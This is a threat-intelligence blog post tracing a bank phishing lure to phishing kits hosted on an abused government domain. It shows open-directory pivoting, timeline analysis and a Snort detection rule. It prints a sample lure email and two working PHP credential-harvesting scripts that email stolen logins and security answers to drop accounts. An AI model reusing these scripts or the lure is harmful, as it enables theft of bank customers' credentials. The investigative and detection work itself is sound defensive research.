Phishing - The Rest of the Story

Receiving an email lure designed to trick you into clicking a phishing link and then logging into a fake website has become a common threat. In this blog we look into how to dive deeper into the threat to move from reactive to proactive. These tactics help a company zoom in on specific threats that are common or repeated against them from both opportunistic and targeted attacks.

Email Lure

The original email lure claims to be from a financial organization as shown below:

From: "omitted" <test@theconstructionbank[.]com> 
Subject: Review – Unusual Activity Detected On Your omitted Account 
Date: April 9, 2018 at 11:06:14 PM MDT[ 
To: Recipients <test@theconstructionbank[.]com> 

Dear Customer,

As part of our security measures, we regularly screen activity in the omitted Online Banking System. Due to recent changes on your online banking system we are contacting you as we have noticed that some information on your account appears to be missing.

We are requesting information from you for the following reason:

Our system requires further account verification. Please click here to follow our secured URL to begin the update process.

Thank you for banking with us.

Regards. 

omitted Customer Support

Can you spot at least three, somewhat obvious clues, that this is likely a phishing lure email?  Take a moment to read it over carefully and then continue reading below.

The most obvious clue that this is phishing is the domain mismatch in the “FROM” address and that of the purported financial entity.  I often see “gmail.com” or other such addresses in fraud-based emails that are not associated with a proper corporate identity.  It can be much more difficult when dealing with a typo-squatting domain that looks legitimate to the human eye, but that is not the case here. The email address “test@theconstructionbank[.]com” is clearly not associated with financial and should be investigated; in this case the domain was likely configured for fraudulent activity instead of being hijacked or abused.

Did you notice that the “To” address is not to a specific individual? This email was unexpected and unlikely to have been generated by the bank. The fact that it is not addressed to a specific individual strongly suggests spam, increasing suspect in this example. In this case, the recipient of this email does not have an account with financial indicating that this is highly likely to be a phishing threat.

Another obvious sign of phishing are the errors in the formatting of the email.  Notice how the use of bold is used to increase a sense of authority and urgency related to the bank. The text “URL” is bolded in the body of the e-mail prompting the user to click on a link.  These are not common business practices, because of phishing, and are all warnings that this email is potentially a phishing threat.

While not shown in the text above, hovering over the “click here” link reveals a mismatch domain link pointing to majenekab.go[.]id.  This is clearly a phishing email threat.  If a user clicks on the link, a fake financial login page is presented to the user in hopes of capturing their credentials (NOTE: no exploits were observed at the time of this research):

Phishing Page for Purported Financial Hosted on majenekab.go[.]id

Common Procedures

Most companies simply respond to phishing threats of this nature in a reactive fashion.  Identify, block, see if anyone clicked on it, and move on.  To move from reactive to proactive we need to understand if this is a campaign that is taking place regularly for which we can potentially identify common tools, tactics, and procedures (TTPs) to proactively filter, block, and identify future threats. If we are lucky, we may also discover other related targets, attribution to threat actors, or victimology, but that is not common in such investigations.

Majenekab.go[.]id

This domain appears to have been abused for the purpose of hosting the phishing site for a short period of time before it is then blacklisted, and the threat removed. The original link to the phishing site is hxxp://majenekab.go[.]id/omitted/omitted/online/merican/omittedonline/.  Knowing that phishing sites are sometimes hosted on insecure sites with open directories, a query to the hxxp://majenekab.go[.]id/omitted /omitted /online/merican/ URL was performed discovering that indeed it is open and insecure and easily abused. Backing all the way out to the “.omitted” directory we find that omitted.zip exists, a possible template for the setup of the phishing page on the abused domain, dated April 10, 2018:

Template for Financial Phishing with Date of April 10, 2018

Notice that the last modified date for the ZIP is the same date and time as that of the directory with the same name, suggesting it is an installer kit installed immediately after upload of the ZIP file. If you traverse to just the domain, we then discover that a number of files exist on the server which can be accessed by anyone on the Internet:

Majenekab.go[.]id Open Directory Reveals Many Files

The sub-directory v2 reveals content that is consistent with the domain and region. However, an interesting directory related to the name of another financial (omitted), created on the same April 10, 2018 date, is another apparent phishing directory, kit, and last modified on the same date as that of the former phishing threat aforementioned. Notice that the newly discovered phishing was set up prior, at 3:11 local time with aforementioned phishing threat at 4:08 local time. This may reveal how long it takes for an attacker to set up a phishing site, test it, or perform other operations when analyzed in total for all phishing sites on a domain of this nature.

Did you notice any other files that you should immediately look at while investigating? There’s a total of three, based upon date and time pivoting, that you can see in the image above.

ZIP File Analysis

Phishing kits exist on this remote compromised site within ZIP files, a TTP for this campaign. A quick triage of all three kits reveals that they contain sub-directories that vary by name but all contain HTML and PHP based content:

Triage of Phishing Kits reveals HTML and PHP Files

Notice the date and time of last modified for each kit. What do you see? How do you interpret that? If you always consider timeline in threat hunting and attribution you can start to piece together developmental history, updates, and so on. Which kit was likely created first, based upon last modified date? Notice that the kit of greatest interest to our investigation modified on April 9, 2018 for the login.php page, the same day the phish was created. 

Notice that the upload date to the server is the 10th, likely due to time zones and local date/time conflicts as you follow the sun; in other words, the site was likely configured and set up in the early morning hours of the 10th for the abused domain, local time, while launching the attack during the 9th in the MST time zone. If handling chain of custody or sequencing forensically these exact date and time correlations must be vetted out. For the purposes of this investigation we can see that modifications to the phishing server was done on or around the same time as the phishing email was sent out, suggesting automation on the part of the attackers, substantiated with the existence of a phishing setup file on the open directory.

Whenever you are investigating phishing attacks, on a deeper level, always look for the “action” on how a form is submitted.  Is the data going to a server-side script such as a POST to a form, or a Gmail account? Also look for attribution on any strings or meta-data which may exist within the archives. In this case, a search for “@” used in emails, was found in two files in the original phishing ZIP file, next1.php and quest2.php. Both have some very interesting data pointing back to a drop Gmail email account:

<?

$ip = getenv("REMOTE_ADDR");

$message .= "-------------- omitted1 Money--------------\n";

$message .= "USER ID : ".$_POST['formtext1']."\n";

$message .= "PASSWORD : ".$_POST['formtext2']."\n";

$message .= "------------- omitted1 -----------------------\n";

$send = "applegvoice3[@]gmail.com";

$subject = "omitted2 Money Ritual - $ip";

$headers = "From: omitted2 Money<support@mymoney.net>";

$headers .= $_POST['eMailAdd']."\n";

$headers .= "MIME-Version: 1.0\n";

$arr=array($send, $IP);

foreach ($arr as $send)

{

mail($send,$subject,$message,$headers);

mail($to,$subject,$message,$headers);

 }

 $praga=rand();

$praga=md5($praga);

    header("Location: index2.html?cmd=login_submit&id=$praga$praga&session=$praga$praga");

?>

Next1.php

<?

$ip = getenv("REMOTE_ADDR");

$message .= "-----------Bofa Job-----------\n";

$message .= "Question 1 : ".$_POST['formselect1']."\n";

$message .= "Answer 1 : ".$_POST['id']."\n";

$message .= "Question 2 : ".$_POST['formselect2']."\n";

$message .= "Answer 2 : ".$_POST['pass']."\n";

$message .= "Question 3 : ".$_POST['formselect3']."\n";

$message .= "Answer 3 : ".$_POST['idmail']."\n";

$message .= "Email Ad : ".$_POST['emails']."\n";

$message .= "IP : ".$ip."\n";

$message .= "-----------NextLevel-------------\n";

$send = "applegvoice3[@]gmail.com";

$subject = " omitted2 Money Ritual - $ip";

$headers = "From: omitted2 Money<support@mymoney.net>";

$headers .= $_POST['eMailAdd']."\n";

$headers .= "MIME-Version: 1.0\n";

$arr=array($send, $IP);

foreach ($arr as $send)

{

mail($send,$subject,$message,$headers);

mail($to,$subject,$message,$headers);

}

header("Location: success.html?signinpage&update=/&cookiecheck=yes&destination=nba/signin&accountopening/ApplicationStartup/ Application$update=&cookiecheck/yes&destinpage&update");

?>

Quest2.php

While we obfuscated some of the code to protect the identity if phished brands, omitted1 and omitted2 are two different financials phished by the same actor.  From the code above it’s clear to see that two different financials are referenced in the code when it’s designed to phish a single financial.  This is a result of borrowed code and the actor not editing it across the board for the financial being phished.

Once the first kit was investigated we couldn’t help but look for what the email drops are for the related kits, assuming the actor uses the same types of drop accounts and exfiltration of data within their TTPs. The second phishing kit goes to scot.mallas@yandex.com. A third phishing page, which you had to discover based upon date and time of modifications to the website, posts to mercyfolder@yandex.com.

Unique to the third phishing kit is a robots.txt file used to block scraping by Google and others. A cursory review of the HTML reveals cookie tracking used by the actor before the destination phishing page is revealed.  In the index2.html page of the original phishing kit we see an interesting string associated with form action:

<form action="quest2.php?section=signinpage&update=&cookiecheck=yes&destination=nba/signin" name=chalbhai id=chalbhai method=post>

Because this string is unique it can be used to then identify through network traffic. If this is reused at a later date, on a new domain and IP, by the same phishing actor or another that uses their code, it will be proactively identified and mitigated from posting stolen credentials. For example, Anomali has blogged on a phishing kit that uses the same string – likely the same campaign, at https://www.anomali.com/blog/teach-a-man-to-phish, with the following suggested Snort alert:

alert tcp any any -> any any (msg:"Possible Phishing Page Template or String"; file_data; content:" name=chalbhai id=chalbhai method=post>"; fast_pattern; sid:123456;)

That was a pretty exciting outcome, so we checked the other kits. Sure enough, they use the same submit string data in their form POSTs.

Theconstructionbank[.]com Domain Research

Remember the mismatch on the “FROM” address used in the original email lure? Coming back to that we find that it was registered in 2016 and has an apparent legitimate website presence. It may have been abused. Additional research is required to understand how this domain was abused in emails affiliated with the “FROM” address of the phishing emails sent to potential targets. Unfortunately, when it comes to email “FROM” addresses, such information is easily faked and misleading with little to no research value outcome.

Reputation Research

Searching for phishing content related to Majenekab.go[.]id yields a number of results just weeks after the original phishing attempt took place.  One site, checkphish.ai, reveals that a Google phishing site existed on Dec. 15, 2017. By performing additional lookups and mapping out date, time, brand, ASN, and other such pivot points, a better understanding of this ongoing phishing campaign can be understood.

Concluding Comments

Congratulations on making it this far in such a long article! This research took an experienced analyst about one hour to perform. If junior, likely two or three hours. If you’re performing whack-a-mole it isn’t worth your time; detect, block and move on. If, however, you are strategic in combating recurrent and common attacks this does have ROI in it for the company. As a result of this extra research we found that a common “POST” string used in the kits can be used to proactively identify and block all attempted exfiltrated phishing attacks from these kits in the future. Imagine having done that work in December of 2017, then blocking the phishing attacks for three brands from April 10, 2018 -- before they were even launched! 

When considering strategically how to move forward, it is necessary to collect metrics on your current risk profile. How many phishing attacks do you identify every day? How many are clicked on and how many phishing incidents do you have each year? How much does it cost you in help desk and remediation to mitigate those incidents? How can you tune your phishing user-awareness training according to your analysis? What do you risk if certain targets are compromised – what data do known victims to date have at risk for the company if their credentials are compromised? 

By analyzing your personal ThreatScape you can very quickly identify if you need to start to move from reactive to proactive on exploit kits, phishing pages, DLP incidents, or similar threats for your organization. Deeper research and response with security integration, as highlighted in this article, can then help position you towards proactive security. Keep in mind the dynamic changes of attack requiring constant updates and tracking by your team. A phishing kit like the one seen in this article may not change for months or even years, with a high ROI for a universal detect and block strategy as found in this article. Other types of threats may be more high maintenance and costly.